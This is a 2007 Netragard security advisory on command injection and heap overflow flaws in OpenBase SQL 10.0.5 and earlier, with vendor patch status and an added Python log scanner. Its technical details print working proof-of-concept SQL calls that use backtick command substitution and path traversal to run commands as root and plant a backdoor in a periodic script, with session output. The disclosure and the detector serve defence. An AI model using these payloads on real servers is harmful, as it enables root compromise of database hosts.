
Netragard Security Advisory 2007-03-13

Posted Nov 6, 2007
Authored by Kevin Finisterre, Adriel T. Desautels, Netragard | Site netragard.com

Netragard, L.L.C Advisory - Netragard's SNOsoft Research Team discovered two critical vulnerabilities in the OpenBase SQL Relational Database that can lead to full system compromise. OpenBase versions 10.0.5 and below are affected.

tags | advisory, vulnerability
SHA-256 | 461394d46dce182dddd5cd5ac8284bec3acbe0ca019c1b7a15477e4a510c19e6


********************** Netragard, L.L.C Advisory**********************
Penetration Testing, Vulnerability Assessments, Web Application Security

Strategic Reconnaissance Team
------------------------------------------------
http://www.netragard.com -- "We make I.T. Safe."

[POSTING NOTICE]
- --------------------------------------------------------------------------
If you intend to post this advisory on your web page please create a
clickable link back to the original Netragard advisory as the contents
of the advisory may be updated. The advisory can be found on the
Netragard website at http://www.netragard.com/

For more information about Netragard visit http://www.netragard.com


[Advisory Information]
- --------------------------------------------------------------------------
Contact : Adriel T. Desautels
Researcher : Kevin Finisterre
Advisory ID : NETRAGARD-20070313
Product Name : OpenBase SQL Relational Database
Product Version : <= OpenBase 10.0.5 (All Platforms)
Vendor Name : OpenBase International, Ltd.
Type of Vulnerability : Remote Buffer Overflow, Command injection
Effort : Easy

[Product Description]
- --------------------------------------------------------------------------
"For over a decade, the OpenBase family of products have been enabling
some of the most innovative business applications at work today. With
thousands of customers worldwide, OpenBase has become a brand that
companies can rely on.

OpenBase customers include AT&T, Adobe Systems, Canon, Walt Disney,
First National Bank of Chicago, MCI, Motorola, Apple, The Sharper Image
and many other innovators worldwide."

- -- http://openbase.com/home-Aboutus.html --

[Technical Summary]
- --------------------------------------------------------------------------
Netragard's SNOsoft Research Team discovered two critical
vulnerabilities in the OpenBase SQL Relational Database that can lead to
full system compromise.

The first vulnerability discovered is a command injection vulnerability
that affects several of the default Stored Procedures. Specifically,
it is possible to execute system commands as the root user by inserting
a series of backticks into the pre-defined Stored Procedures.

The second vulnerability discovered is a buffer overflow that causes heap
corruption. This also has the potential to lead to the execution of
arbitrary code or a Denial of Service condition.


[Technical Details]
- --------------------------------------------------------------------------
1. call AsciiBackup('\`id\`')
results in commands being run as root.

desktop:/tmp kfinisterre$ tail -f /tmp/isql_messages

OpenBase ISQL version 8.0 for MacOS X
Copyright (c) 1993-2003 OpenBase International. Ltd.
All Rights Reserved.

Using database 'WOMovies' on host 'localhost'

Could not write file:uid=0(root) gid=0(wheel) groups=0(wheel)/WOMovies.bck

2. call GlobalLog("../../../path/to/file", "\n user input goes here \n")
results in root owned files being created. Combine with above for an
easy backdoor.

openbase 1> call GlobalLog("../../../../../../etc/periodic/daily/600"
, "\n/usr/bin/id > /tmp/file\n")
openbase 2> go
Data returned... calculating column widths

return_0
- ----------
Success
- ----------
1 rows returned - 0.039 seconds (printed in 0.039 seconds)
openbase 1> call AsciiBackup('`chmod +x /etc/periodic/daily/600.msg;
/usr/sbin/periodic daily`')
openbase 2> go
Data returned... calculating column widths

return_0
- ----------
Failure
- ----------
1 rows returned - 1.825 seconds (printed in 1.826 seconds)
openbase 1>

3. select aaaaaaaaaaaaaaaaaaaa... from aaaaaaaaaaaaaaaaaaa...
results in zone_free() issues referencing 0x61616161

4. call OEMLicenseInstall("`/usr/bin/id>/tmp/aaax`","`/usr/bin/id>/tmp/bbbx`","`/usr/bin/id>/tmp/ddddx`","`/usr/bin/id>/tmp/cdfx`")
results in commands being run as root

An exploitable vulnerability exists in OpenBase in the creation of
Stored Procedures that can be used to gain NT AUTHORITY\SYSTEM or root
level privileges. Specifically, a user can create a stored procedure
with an unusually long name, which will trigger a buffer overflow
condition that will result in heap corruption. If done properly, an
attacker may be able to execute arbitrary commands against the affected
system.
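
The four cases above have recognisable statement shapes, so SQL statement
logs can be screened for them. The following is an added example, not part
of the Netragard advisory or of OpenBase: the names inspect_statement, scan
and MAX_IDENT, the 64-character limit and the sample statements are
assumptions, and the check for $( ) generalises beyond the backticks shown
in the advisory.

```python
import re

MAX_IDENT = 64  # assumption: longest identifier your schema legitimately uses

CALL_RE = re.compile(r"\bcall\s+(\w+)\s*\((.*)\)", re.I | re.S)
STRING_RE = re.compile(r"'((?:[^'\\]|\\.)*)'|\"((?:[^\"\\]|\\.)*)\"", re.S)
CMD_SUBST = re.compile(r"`|\$\(")   # backticks (from the advisory) and $( )
LONG_IDENT = re.compile(r"\w{%d,}" % (MAX_IDENT + 1))


def inspect_statement(sql):
    """Return sorted finding labels for one SQL statement."""
    findings = set()
    call = CALL_RE.search(sql)
    if call:
        # The advisory says several default procedures are affected, so
        # every call is inspected, not only the three it names.
        for single, double in STRING_RE.findall(call.group(2)):
            arg = single or double
            if CMD_SUBST.search(arg):
                findings.add("command-substitution-in-argument")
            if "../" in arg:
                findings.add("path-traversal-in-argument")
    # Identifiers live outside string literals; blank the literals first.
    if LONG_IDENT.search(STRING_RE.sub("''", sql)):
        findings.add("oversized-identifier")
    return sorted(findings)


def scan(statements):
    """Return [(index, findings)] for statements with any finding."""
    hits = []
    for i, sql in enumerate(statements):
        found = inspect_statement(sql)
        if found:
            hits.append((i, found))
    return hits


# Constructed sample statements modelled on the cases in this advisory.
SAMPLE = [
    "select TITLE from MOVIE where TITLE = 'Alien'",
    "call AsciiBackup('/backups/nightly')",
    "call AsciiBackup('`id`')",
    r'call GlobalLog("../../../tmp/example", "\n constructed text \n")',
    "select " + "a" * 200 + " from " + "a" * 200,
]

if __name__ == "__main__":
    for index, found in scan(SAMPLE):
        print(index, SAMPLE[index][:40], found)
```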


[Proof Of Concept]
- --------------------------------------------------------------------------
See Above

[Vendor Status]
- --------------------------------------------------------------------------
Vendor Notified on 03/05/07
Vendor Patched on 03/09/07
Vendor quote:

"OpenBase now runs as the 'openbase' user for security reasons. I would
like to publicly thank Kevin Finisterre for his input."

[Disclaimer]
- ------------------------http://www.netragard.com--------------------------
Netragard, L.L.C. assumes no liability for the use of the information
provided in this advisory. This advisory was released in an effort to
help the I.T. community protect themselves against a potentially
dangerous security hole. This advisory is not an attempt to solicit
business.

http://www.netragard.com
